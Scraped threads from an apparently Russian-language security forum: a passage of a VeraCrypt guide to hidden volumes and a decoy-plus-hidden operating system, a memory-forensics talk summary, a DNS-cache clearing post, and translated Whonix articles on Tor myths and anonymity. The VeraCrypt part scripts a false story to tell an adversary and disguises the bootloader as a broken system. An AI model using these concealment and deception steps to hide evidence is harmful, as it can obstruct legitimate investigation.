Выбираем путь, алгоритм шифрования, размер. Дополнительно к паролю можно указывать ключевые файлы и PIM. Пункт «Использовать PIM» позволяет задать «Персональный умножитель итераций», влияющий на надежность шифрования прямо и косвенно (при указании PIM, его потребуется вводить в дополнение к паролю тома, т.е. взлом перебором усложняется). В следующем окне нужно около 30ти секунд перемещать мышкой в окне программы для набора случайных данных

Собственно, и создаем внешний том. Теперь займемся созданием скрытого. Процесс создания однотипен, поэтому не будет вдаваться в детали. Единственно, не стоит забывать, пароль от внешнего и скрытого томов должны отличатся

Итак, том создался и успешно примонтирован. Теперь можно заполнить том необходимой информацией. Не стоит забывать про скрытый том, когда заполняете внешний. Ведь файлы могут повредить или полностью уничтожить скрытый том. К счастью, разработчики подумали об этом

Теперь рассмотрим метод шифрования всей системы. Как и для создания шифрованного тома, здесь доступны два «режима»: обычный и скрытый. Поговорим про обычный и в меню система выберем первый пункт

Далее столкнемся с выбором одиночной загрузки или мультизагрузки. Так как для теста взята виртуальная машина с одной операционной системой, выберем одиночную загрузку

Можем использовать следующие алгоритмы шифрования: AES, Serpent, Twofish, Camellia, Кузнечик, а также комбинации этих алгоритмов

Пароль должен быть сложным и не иметь ассоциаций с пользователем и его окружением. Максимальная длина пароля 128 символов

Вводим PIM и запомним его

Важно сохранить резервную копию загрузчика VeraCrypt

Данные которые сейчас присутствуют на разделе необходимо «занулить», что бы их нельзя было восстановить

Теперь программа предложит на перезагрузится и попробовать вести пароль и PIM для тестирования

Если все удалось, то операционная система загрузится, и мы увидим следующее окно

Шифрование целой ОС занимает много времени, подождем

Теперь, каждый раз при загрузке компьютера или виртуальной машину придется вводить пароль и PIM

Теперь наша операционная система надежно защищена. Однако, возможны неприятные обстоятельства, которые вынуждают вас дать пароль на расшифровку. Что бы защитится от подобных ситуаций создадим скрытую операционную систему. Как и для скрытого тома так и для скрытой системы работает правило правдоподобного отрицания, ведь скрытая ОС устанавливается именно на скрытый том.

Рассмотрим процесс создания скрытой ОС. Пропустим некоторые шаги, которые уже были разобраны в алгоритме «обычное шифрование ОС». Сначала мастер проверит что в вашей системе есть подходящий раздел жесткого диска (раздел 2) для размещения скрытой ОС

Требуется создать раздел, который будет больше чем нынешний системный раздел. Создадим его (том Е)

Следуем указанием мастера и очень внимательно читаем

Зашифруем внешний том (том Е)

Мы зашифровали том Е и мастер предложит создать скрытый том. Читаем предупреждение

Выбираем алгоритм, придумываем пароль и создаем скрытый том. Мастер предложит клонировать ОС

Перезагружаемся и ждем окончания

После окончания процесса вводим пароль к скрытой ОС. Читаем

Теперь следует очистить исходную ОС, которая была раньше установлена на жестком диске

Чтобы добиться правдоподобного отрицания причастности, нужно создать обманную (приманку) ОС

VeraСrypt предупреждает, что windows должна быть той же версии что и работающая сейчас. Это необходимо потому, что обе ОС будут использовать общий загрузочный раздел. Монтируем образ и устанавливаем windows

Нельзя создавать никаких разделов между разделами с обманной и скрытой системами

Что же, устанавливаем, и тем самым перезапишем загрузчик VeraСrypt на windows’ый. Ничего страшного, этот загрузчик восстановится, после того, как обманную ОС нам следует будет зашифровать.
После установки windows (обманная) шифруем (зашифровать системный раздел) ее тем же алгоритмом и хешированием, что и скрытую ОС, иначе скрытая ОС будет недоступна. Причина этого требования в том, что обманная и скрытая системы используют один и тот же загрузчик, поддерживающий только один алгоритм, выбранный пользователем (для каждого алгоритма есть свой загрузчик VeraCrypt). В итоге мы имеем два пароля, от обманной и скрытой ОС. Но есть еще и третий пароль, который принадлежит внешнему тому (в котором и находится скрытая ОС). Если вы сообщите неприятелю пароль от обманной ОС, и он спросит, почему свободное место на (обманном) системном разделе содержит случайные данные, вы сможете, например, ответить: "Этот раздел раньше содержал систему, зашифрованную VeraCrypt, но я забыл(а) пароль предзагрузочной аутентификации (или система повредилась и перестала загружаться), поэтому мне пришлось переустановить Windows и снова зашифровать раздел".

Еще есть одна интересная «штука». Можно изменить загрузчик VeraCrypt, вплоть до того, что вообще нечего не будет отображаться

Так выглядит загрузчик. Похоже на типичную проблему windows, когда у нее проблемы с загрузчиком (мигает полоска в левом верхнем углу)

Это может быть полезным, чтобы кто-то посторонний, наблюдающий за вашим пк не знал, что вы пользуетесь VeraCrypt. Можно также вписать туда третью ошибку MBR’а – Missing operating system

Увидев такое, некто и не подумает, что системный диск зашифрован с помощью VeraCrypt, однако это легко можно выяснить, путем анализа загрузчика.

В статье были детально рассмотрены алгоритмы создания скрытого тома, шифрования системного раздела и создание скрытой ОС. И на этом возможности VeraCrypt заканчиваются, однако есть утилита, способна создать в контейнере VeraCrypt больше двух скрытых томов – DcsWinCfg.

Memory Forensics

ID: 676533bbb4103b69df371ce3
Thread ID: 36726
Created: 2020-04-24T14:47:43+0000
Last Post: 2020-04-24T14:47:43+0000
Author: pablo
Prefix: Видео
Replies: 0 Views: 2K

Доклад посвящён работе с дампами памяти с использованием open-source программы volatility. В нём рассмотрен принцип работы основных плагинов, а так же на что надо обращать внимание при исследовании.

Удаляем историю/сайты, посещённые в режиме инкогнито

ID: 676533bbb4103b69df371ce8
Thread ID: 29297
Created: 2019-05-14T14:31:00+0000
Last Post: 2020-04-13T12:55:06+0000
Author: APAXUCY
Replies: 4 Views: 2K

И так начнём!
Первым делом скачиваем данные файлы -

You must have at least 10 message(s) to view the content.

Как вычислить сайты, посещённые в режиме инкогнито? - очень просто - :
Копируем данную команду или берем её из файла - cash
И вставляем в cmd. После у нас в корне диска C, создается txt файл -DNScache.txt
И мы видим, что там написаны все хосты, которые вы посещали.
Как же удалить их - :
Запускаем команду в cmd под названием clean_cash, и у нас эта команда очистила кэш DNS.
Ну думаю вы поняли что бы посмотреть наш кэш запускаем cash а что-бы очистить запускаем clean_cash.

PS: В папке есть cmd команды

Мифы и заблуждения Tor

ID: 676533bbb4103b69df371cee
Thread ID: 34456
Created: 2020-01-19T11:05:36+0000
Last Post: 2020-04-13T12:33:45+0000
Author: wackyph
Prefix: Статья
Replies: 3 Views: 2K

Spoiler: От себя

Это автоматический перевод https://www.whonix.org/wiki/Tor_Myths_and_Misconceptions, ностоятельно рекомендую прочитать, хотя бы с помощью того же гугл переводчика все статьи https://www.whonix.org/wiki/Documentation от начала до конца по порядку, инфы там гараздо больше чем в курсах за 30000, что продают на соседних форумах

Заходите на все ссылки через Tor browser, они ведут на гугл переводчик
Введение
В современном обществе существует множество ложных утверждений относительно сети Tor («темная сеть»), браузера Tor и платформ или программного обеспечения, использующего Tor, например Whonix ™. Мифы и заблуждения подкрепляются целым рядом факторов, в том числе: отсутствием понимания, правительственной пропагандой и сосредоточением внимания СМИ на потенциальных негативных приложениях Tor. Например, средства массовой информации постоянно подрывают существование рынков незаконных услуг / товаров и различных видов преступной деятельности, запускаемых из сети.

Эта глава предназначена для того, чтобы развеять некоторые из наиболее распространенных мифов Tor, подчеркивая при этом, что дезинформация наносит большой ущерб технологически нейтральному инструменту и миллионам, использующим его ежедневно. Во всем мире пользователи Tor имеют очень разные и практичные причины для развертывания анонимности в Интернете. Если проанализировать беспристрастно, то становится очевидным, что Tor используется преимущественно для блага - для обеспечения нашего неотъемлемого права на неприкосновенность частной жизни, повышения безопасности и для защиты уязвимых групп, таких как осведомители, диссиденты и активисты. С другой стороны, Tor / Tor Browser и любое другое существующее программное обеспечение несовершенно, а это означает, что «абсолютная анонимность», которую ищут некоторые, является миражом.

Базовое понимание протокола Tor и того, как он помогает защищать анонимность, см. В разделе: [Как HTTPS и Tor работают вместе для защиты вашей анонимности и конфиденциальности](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://eff.org/tor- and- https&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhjpd1m5jg7noKCRUjtCFkMsEYg8cQ) [[архив]](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://web.archive.org/web/https://eff.org/tor- and- https&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhgXiSjI2cCHZ015nE6jBtSvKWTmtw) от Electronic Frontier Foundation.

Распространенные мифы и заблуждения Tor
Tor для преступников, которые хотят скрыть незаконные сделки с правоохранительными органами! [[1]](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://www.whonix.org/wiki/Tor_Myths_and_Misconceptions&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhjegEf_WUvKnjipyASO- OAf-jHjzA#cite_note-EFF_Tor_Myths-1) [[2]](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://www.whonix.org/wiki/Tor_Myths_and_Misconceptions&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhjegEf_WUvKnjipyASO- OAf-jHjzA#cite_note-Dingledine_Tor_Myths-2)

Tor в основном предназначен для сильной анонимности и помогает тем, кто не хочет делиться своей историей посещений, коммуникациями и другой онлайн- деятельностью, с корпорациями и правительственными организациями, которые осуществляют подробный мониторинг всего интернет-трафика. Это также помогает цензурированным пользователям получать свободный доступ к информации, журналистам защищать свои источники и ограничивает риски корпоративного шпионажа. Примечательно, что только около 3 процентов всего трафика Tor приходится на «темную сеть» (сайты .onion ) - многие объявления в СМИ о масштабах скрытых сервисов и возможной преступности завышены. kaspersky.com отмечает: [[3]](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://www.whonix.org/wiki/Tor_Myths_and_Misconceptions&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhjegEf_WUvKnjipyASO- OAf-jHjzA#cite_note-Kaspersky_Tor_Myths-3)

Но, несмотря на репутацию темной сети как убежища для преступной деятельности, недавний опрос показал, что только 45% сайтов .onion, по- видимому, содержат незаконную деятельность. И это не так обширно, как это сделали некоторые люди. В то время как в наземной сети размещаются миллиарды различных сайтов, предполагается, что скрытые сайты Tor насчитывают только тысячи, возможно, десятки тысяч, но не более.

Click to expand...

Проще говоря, без Tor пользователи просматривают голые страницы и могут быть тщательно отслежены, где бы и когда бы они ни выходили в интернет. Никто не должен чувствовать себя виноватым, когда предпринимает упреждающие шаги для противодействия сетевым наблюдателям, так как чрезвычайно подробные профили создаются для корпоративных или разведывательных целей. Кроме того, преимущества Tor не сбрасываются со счетов действиями меньшинства, которое использует его в злых целях. Дело в том, что подавляющее большинство трафика Tor используется в законных, законных целях. Запрет Tor будет приводить к тому, что преступники будут использовать другие инструменты и методы для гнусных целей, в то же время отказывая в защите тем людям в обществе, которые нуждаются или желают этого - Tor всегда будет «обоюдоострым мечом».

Tor был разработан американским военным и Государственным департаментом, поэтому он не может защитить от наблюдения США. [[1]](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://www.whonix.org/wiki/Tor_Myths_and_Misconceptions&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhjegEf_WUvKnjipyASO- OAf-jHjzA#cite_note-EFF_Tor_Myths-1) [[4]](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://www.whonix.org/wiki/Tor_Myths_and_Misconceptions&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhjegEf_WUvKnjipyASO- OAf-jHjzA#cite_note-Privacytools_Tor_Myths-4)

Tor не был написан правительством США - Tor на самом деле был написан Роджером Дингледином, а позже к нему присоединился Ник Мэтьюсон. Первоначальное финансирование для разработки Tor было предоставлено военно-морской исследовательской лабораторией США через Пола Сиверсона. Государственный департамент также частично финансирует Tor, поскольку он используется для обхода цензуры в различных местах. Примечательно, что доля финансирования со стороны правительства США со временем уменьшается, так как появляются более разнообразные варианты финансирования и увеличиваются финансовые взносы сообщества; см. спонсоров проекта Tor [архив], чтобы узнать больше. [[5]](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://www.whonix.org/wiki/Tor_Myths_and_Misconceptions&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhjegEf_WUvKnjipyASO- OAf-jHjzA#cite_note-5)

Утверждения о целенаправленном, злонамеренном бэкдоре считаются крайне спекулятивными, поскольку программное обеспечение, несомненно, используется различными американскими агентствами и оперативниками. Таким образом, бэкдор Tor может подорвать безопасность их собственных систем анонимности. Более того, если бы только государственные органы использовали Tor, он был бы бесполезен; весь трафик будет автоматически помечен как связанный с разведкой. Один фундаментальный принцип анонимности: «Анонимность любит компанию». Это означает, что большое и разнообразное население необходимо для того, чтобы затруднить поиск любого отдельного человека.

Код Tor также тщательно проверяется множеством специалистов по безопасности, и такой бэкдор не был обнаружен после более чем 15 лет разработки. Весь код проекта Tor имеет открытый исходный код, а дизайн и реализация прозрачны. Невероятно, что будущие разработчики Tor намеренно изменят исходный код, чтобы шпионить за его пользователями, и не будут обнаружены в процессе.

Моя анонимность на 100% гарантирована Tor. [[1]](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://www.whonix.org/wiki/Tor_Myths_and_Misconceptions&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhjegEf_WUvKnjipyASO- OAf-jHjzA#cite_note-EFF_Tor_Myths-1) [[6]](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://www.whonix.org/wiki/Tor_Myths_and_Misconceptions&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhjegEf_WUvKnjipyASO- OAf-jHjzA#cite_note-Common_Tor_Myths-6)

Tor не является волшебным решением, обеспечивающим гарантированную анонимность. Все программное обеспечение имеет недостатки как в коде, так и в дизайне, которые предоставляют опытным злоумышленникам возможности для эксплойтов. Ряд сетевых атак Tor уже хорошо известны в литературе, подчеркивая, что пользователи могут быть деанонимированы в различных ситуациях. Кроме того, множество других потенциальных спекулятивных атак Tor может быть запущено против клиента Tor, серверов и / или сети.

Таким образом, программное обеспечение Tor не всегда может защитить личность пользователя, но оно может последовательно анонимизировать происхождение интернет-трафика. Несмотря на успехи правительственных учреждений в нацеливании и использовании некоторого трафика, связанного с Tor, раскрытие разведывательных данных показало, что это было препятствием для массового наблюдения во время раскрытия информации Snowden в 2013 году. Использование только Tor / Tor Browser в изоляции не будет защищать личность; Также необходимо изменить онлайн-поведение. Например, важно использовать надежное шифрование, запутывать стиль письма, не раскрывать личные интересы, не доверять незнакомцам, ограничивать раскрытие информации в Интернете и следовать множеству других советов, чтобы оставаться анонимными. Игнорирование этих правил - быстрый путь к деанонимизации.

Весь мой трафик по умолчанию зашифрован. [[6]](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://www.whonix.org/wiki/Tor_Myths_and_Misconceptions&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhjegEf_WUvKnjipyASO- OAf-jHjzA#cite_note-Common_Tor_Myths-6)

Это распространенное заблуждение новичков Tor / Tor Browser. Как указано в главе Tor Browser Encryption , множество данных может быть видно различным наблюдателям сети в зависимости от того, зашифровано ли окончательное соединение с помощью HTTPS или нет. Видимые данные могут включать в себя: посещенный сайт; место расположения; используется ли Tor; и через обмен данными, пользователь / пароль и данные конкретной деятельности. См. HTTP / HTTPS Соединения с и без Tor для получения дополнительной информации.

Главная идея заключается в том, что пользователи должны стараться использовать HTTPS и TLS, когда это возможно, поскольку Tor только шифрует трафик, когда он проходит через сеть из трех узлов. Выходные узлы остаются уязвимыми, если трафик не зашифрован, так как это текстовая версия сообщения. Еще лучше использование Onion Services Encryption , поскольку соединение образует туннель, который зашифрован (сквозной) с использованием случайной точки встречи в сети Tor; HTTPS не требуется. Эти соединения также включают в себя совершенную прямую секретность (PFS), что означает, что компрометация долгосрочных ключей не ставит под угрозу прошлые сеансовые ключи.

Tor внесет меня в список постоянных наблюдателей! [[4]](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://www.whonix.org/wiki/Tor_Myths_and_Misconceptions&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhjegEf_WUvKnjipyASO- OAf-jHjzA#cite_note-Privacytools_Tor_Myths-4)

В современную эпоху все находятся в списке наблюдения. Раскрытие информации показало, что намерение правительственных учреждений состоит в том, чтобы регистрировать всю онлайн-активность, чтобы подробные досье были доступны для всего населения. Хотя это правда, что шифрованный, VPN и трафик, связанный с Tor, особенно интересны для IC, это лучше, чем отсутствие анонимности вообще. Конечным решением является значительное расширение сети Tor и пользователей, чтобы повысить ее эффективность.

Гораздо лучше блокировать меры массового наблюдения через Tor в качестве метода сопротивления, чем капитулировать перед недемократическими мерами полицейского государства, которые были тайно осуществлены без ведома общественности. Принципы должны превосходить гипотетические контрольные списки, поскольку пользователи в большинстве современных национальных государств не предпринимают никаких дополнительных действий при этом шаге. Единственным исключением могут быть репрессивные состояния, где использование Tor особенно опасно, но в зависимости от обстоятельств мосты или подключаемые транспорты могут быть разумным решением.

Но узлы выхода Tor могут манипулировать моим трафиком! [[4]](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://www.whonix.org/wiki/Tor_Myths_and_Misconceptions&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhjegEf_WUvKnjipyASO- OAf-jHjzA#cite_note-Privacytools_Tor_Myths-4)

Как указывалось ранее, этот риск, как правило, избегается за счет использования зашифрованных соединений, когда трафик покидает выходной узел (HTTPS), или использования соединений .onion которые остаются в самой сети Tor. Изменение вашего собственного поведения в Интернете является ключом для обеспечения безопасности в этом случае и отказа от использования сервисов, которые подвергают пользователей риску, не шифруя трафик на сервер. [[7]](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://www.whonix.org/wiki/Tor_Myths_and_Misconceptions&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhjegEf_WUvKnjipyASO- OAf-jHjzA#cite_note-7) Управление трафиком вредоносными выходными узлами невозможно, если они не знают, что содержат зашифрованные пакеты HTTPS.

Но правительство устанавливает множество узлов Tor для анонимизации людей! [[4]](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://www.whonix.org/wiki/Tor_Myths_and_Misconceptions&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhjegEf_WUvKnjipyASO- OAf-jHjzA#cite_note-Privacytools_Tor_Myths-4) [[2]](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://www.whonix.org/wiki/Tor_Myths_and_Misconceptions&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhjegEf_WUvKnjipyASO- OAf-jHjzA#cite_note-Dingledine_Tor_Myths-2)

Роджер Дингледин, соучредитель Tor, заявил:

«Действительно, некоторые спецслужбы часто запускают реле. Но я знаю две трети людей, которые лично управляют реле. Они просто нет », - сказал он о правительственных шпионах. Он утверждает, что для АНБ нет смысла запускать реле. «Они уже смотрят AT & T, Deutsche Telekom и кабели под океанами. Они уже вложены в исследование интернета, поэтому это не имеет смысла », - сказал Дингледин.

Click to expand...

Как упоминалось ранее, Tor не является неуязвимым. Тем не менее, трудно последовательно деанонимизировать большую часть трафика Tor без значительных затрат ресурсов и времени со стороны злоумышленников (или прямой целевой атаки на платформу конечного пользователя). В большинстве случаев злоумышленникам необходимо контролировать / наблюдать трафик как на входном, так и на выходном узлах для атак подтверждения или выполнять другие виды анализа трафика . Меньшие противники имеют еще меньше возможностей для деанонимизации трафика Tor, особенно с ростом сети. Атаки просто становятся сложнее и дороже в исполнении.

Единственным исключением из этого заблуждения о деанонимизации являются глобальные пассивные противники (GPA) [[8]](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://www.whonix.org/wiki/Tor_Myths_and_Misconceptions&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhjegEf_WUvKnjipyASO- OAf-jHjzA#cite_note-8) , которые, вероятно, способны или отслеживают трафик между всеми компьютерами в сети одновременно. Изучая временные характеристики и объемные характеристики различных коммуникаций в сети, статистически возможно идентифицировать каналы Tor и, таким образом, сопоставлять клиентов Tor с целевыми серверами. Неизвестно, в какой степени GPA удалось полностью или частично деанонимизировать сетевой трафик Tor. Надеемся, что будущие разоблачения заявителей откроют эту возможность для общественности.

Tor запрещен для скачивания! [[3]](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://www.whonix.org/wiki/Tor_Myths_and_Misconceptions&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhjegEf_WUvKnjipyASO- OAf-jHjzA#cite_note-Kaspersky_Tor_Myths-3)

Распространенным заблуждением является то, что простая загрузка Tor / Tor Browser является либо незаконной, либо признаком преступной деятельности. Это правда, что загрузка Tor Browser, вероятно, контролируется правоохранительными органами и IC для обозначения «лиц, представляющих интерес», но почти во всех юрисдикциях загрузка и эксплуатация самого программного обеспечения не является незаконной. [[9]](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://www.whonix.org/wiki/Tor_Myths_and_Misconceptions&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhjegEf_WUvKnjipyASO- OAf-jHjzA#cite_note-9) Как обсуждалось ранее, подавляющее большинство трафика Tor приходится на стандартные (не скрытые) сайты, что означает, что большинство пользователей вместо этого пытаются установить безопасную связь; делиться информацией; выражать политические мнения; избегать цензуры; защищать журналистские источники; избегать массового наблюдения и так далее.

Tor слишком медленный для потоковой передачи / торрента. [[10]](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://www.whonix.org/wiki/Tor_Myths_and_Misconceptions&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhjegEf_WUvKnjipyASO- OAf-jHjzA#cite_note-Debian_Tor_Myths-10)

Tor значительно улучшил свою пропускную способность за последние несколько лет, так как количество (выходных) узлов постоянно увеличивалось, в то время как рост числа пользователей оставался скромным. Фактически, большая часть потоковой передачи может осуществляться с небольшими перерывами (включая YouTube на момент написания), и в среднем используется только около половины доступной пропускной способности; см. страницы метрик Tor [архив] . Торрент возможен, но не рекомендуется, так как отдельный торрент-файл может равняться нескольким часам просмотра для обычных пользователей.

Если я управляю узлом Tor (выход), я буду арестован или у меня будут проблемы с моим провайдером! [[10]](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://www.whonix.org/wiki/Tor_Myths_and_Misconceptions&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhjegEf_WUvKnjipyASO- OAf-jHjzA#cite_note-Debian_Tor_Myths-10)

Это не совсем верно. Большинство людей, которые получили внимание от правоохранительных органов или подверглись преследованиям, решили запустить узел выхода Tor. Существует ряд ресурсов, с которыми необходимо ознакомиться, прежде чем принимать это решение, чтобы свести к минимуму вероятность преследования:

Проект Tor: Так чего же мне ожидать, если я запускаю выходное реле? [архив]

Советы по запуску выходного узла [архив]

Шаблоны злоупотреблений Tor [архив]

Часто задаваемые вопросы о злоупотреблении Tor [архив]

Вам также может быть интересно проверить, насколько распространено использование Tor в вашей стране, прежде чем принимать это решение, см. На страницах Tor Metrics [архив] .

Сноски

https://www.eff.org/files/2015/11/23/3mod-tor-myths-and-facts_9-10-15.pdf [архив]

https://threatpost.com/tor-developer-busts-myths-announces-new-features/127207/ [архив]

https://go.kaspersky.com/rs/802-IJN-240/images/Dark%20Web%2010172017.pdf?aliId=521973948 [архив]

https://write.privacytools.io/my-hytsts-on-security/slicing-onions-part-1-myth-busting-tor [архив]

FAQ Часто задаваемые вопросы о доноре Tor [архив]:

Tor поддерживается государственными финансирующими агентствами США, неправительственными организациями, частными фондами, исследовательскими институтами, частными компаниями и более чем 20 000 личных пожертвований от таких людей, как вы. (См. Нашу страницу спонсоров для получения дополнительной информации.) Хотя мы благодарны за это финансирование, мы не хотим, чтобы проект Tor стал слишком зависимым от какого-либо одного источника. Краудфандинг позволяет нам диверсифицировать нашу донорскую базу и неограничен - он позволяет нам тратить деньги на проекты, которые мы считаем наиболее важными, и быстро реагировать на меняющиеся события.

Click to expand...

[6. https://www.maketecheasier.com/common-myths-about- tor/](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://www.maketecheasier.com/common- myths-about- tor/&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhjsc6ThifY7kZP_7oFxarWBqnxyAA) [[архив]](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://web.archive.org/web/https://www.maketecheasier.com/common- myths-about- tor/&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhgbYf_aI1Evyw8a-3eJav82QN02FA)

7. В частности, в конце 2018 года [почти 75 процентов всего интернет- трафика](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://etherealmind.com/percentage- of-https-tls-encrypted-traffic-on-the- internet/&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhgnU66MXwMLO9u2p-LMEspHZAwDkQ) [[архива]](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://web.archive.org/web/https://etherealmind.com/percentage- of-https-tls-encrypted-traffic-on-the- internet/&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhgAoWXVLyMJnFDdC9qkDqQ- Vj3a7Q) было зашифровано с помощью HTTPS.
8. Как АНБ.
9. Такие диктатуры, как Северная Корея, являются скорее исключением, чем правилом.
10.https://wiki.debian.org/TorBrowser [[архив]](https://translate.googleusercontent.com/translate_c?depth=2&rurl=translate.google.com&sl=auto&sp=nmt4&tl=ru&u=https://web.archive.org/web/https://wiki.debian.org/TorBrowser&xid=17259,15700002,15700021,15700186,15700190,15700256,15700259,15700262,15700265,15700271&usg=ALkJrhgmChSYCa- QzrnqAU9Lg1nAFJLZTg)

Советы по сохранению анонимности

ID: 676533bbb4103b69df371cef
Thread ID: 34552
Created: 2020-01-23T17:45:47+0000
Last Post: 2020-04-13T12:32:55+0000
Author: wackyph
Replies: 3 Views: 2K

Spoiler: От себя

Это автоматический перевод https://www.whonix.org/wiki/DoNot, ностоятельно рекомендую прочитать, хотя бы с помощью того же гугл переводчика все статьи https://www.whonix.org/wiki/Documentation от начала до конца по порядку, инфы там гараздо больше чем в курсах за 30000, что продают на соседних форумах

Заходите на все ссылки через Tor browser, они ведут на яндекс переводчик
Содержание

Введение

Режима Анонимности

путать анонимность с псевдонимностью

Режимы Анонимности Mix

Режим 1: Анонимный Пользователь; Любой Получатель

Режим 2: Пользователь Знает Получателя; Оба Используют Tor

режим 3: пользователь не является анонимным и использует Tor; любой получатель

режим 4: пользователь не является анонимным; любой получатель

заключение

лицензия

личности, личная и системная информация

Раскрывать Идентифицирующие Данные В Режиме Онлайн

Сделать Неверные Выводы

поддержание долгосрочной идентичности

публикация полных системных журналов или файлов конфигурации

пост-чувствительные скриншоты или экранные фотографии

отправка конфиденциальных данных без сквозного шифрования

одновременно использовать различные сетевые удостоверения

Проверка Использования (Мобильного) Телефона

интернет-сервера и ресурсы

подключение к серверу анонимно и не анонимно одновременно

Открытие случайных файлов или ссылок

сначала распространите свою собственную ссылку

посетите свой собственный веб-сайт, когда он является анонимным

Логинов

вход в учетные записи, используемые без Tor

вход на банковские или онлайн-платежные счета

войдите в учетные записи социальных сетей и думайте, что вы анонимны

войдите в систему Twitter, Facebook, Google и т.д. Дольше, чем это необходимо

Системные Настройки

изменить настройки, если последствия неизвестны

Tor

разрешить Tor над сценариями Tor

используйте мосты, если Tor считается опасным или подозрительным в вашем местоположении

переключение между Tor и Open Wi-Fi

используйте Clearnet и Tor одновременно

что такое Clearnet?

обоснование

сноски

атрибуция

Введение
В этой главе представлен неисчерпаемый список способов поведения, которые пользователи не должны делать, когда требуется строгая анонимность.

Режимы анонимности

Путать анонимность с псевдонимностью
В этой главе объясняется различие между анонимностью и псевдонимом. Обратите внимание, что определение терминов всегда является сложным процессом, поскольку требуется консенсус большинства:

Анонимное соединение : соединение с целевым сервером, где оно не имеет возможности обнаружить источник (IP-адрес / местоположение) соединения, ни связать с ним какой-либо идентификатор [1].

Псевдонимное соединение : соединение с целевым сервером, где оно не имеет возможности обнаружить источник (IP-адрес / местоположение) соединения, но может быть связано с идентификатором. [1]

